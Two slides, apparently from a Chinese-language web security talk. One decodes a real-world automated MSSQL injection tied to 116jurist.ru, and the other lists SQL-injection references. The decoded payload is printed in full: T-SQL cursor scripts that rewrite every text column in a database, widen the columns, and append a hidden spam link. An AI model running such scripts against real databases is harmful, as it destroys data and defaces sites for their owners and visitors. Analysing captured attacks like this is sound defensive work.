37. MSSQL實際案例 - 116jurist.ru自動化注入解碼
(4/4)
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and
t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where ['+@C+']
like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
•
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and
t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
•
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and
t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC('UPDATE ['+@T+'] SET
['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}<
/style><div class=a4tw><a href=http://116jurist.ru>þðèäè÷åñêèå-óñëóãè-ìîñêâà</a></div>'' ') FETCH NEXT FROM
Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
38. 參考資料
• 吳翰清, 網路竟然這麼危險(白帽子讲Web安全), 2012
• MySQL, String Functions, 5.1
• MySQL, Miscellaneous Functions, 5.1
• MySQL/PHP 对单引号转义时load_file/outfile 生成一句话
• Shazin Sadakath, Time Based SQL Injection using heavy queries in
MySQL
• Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008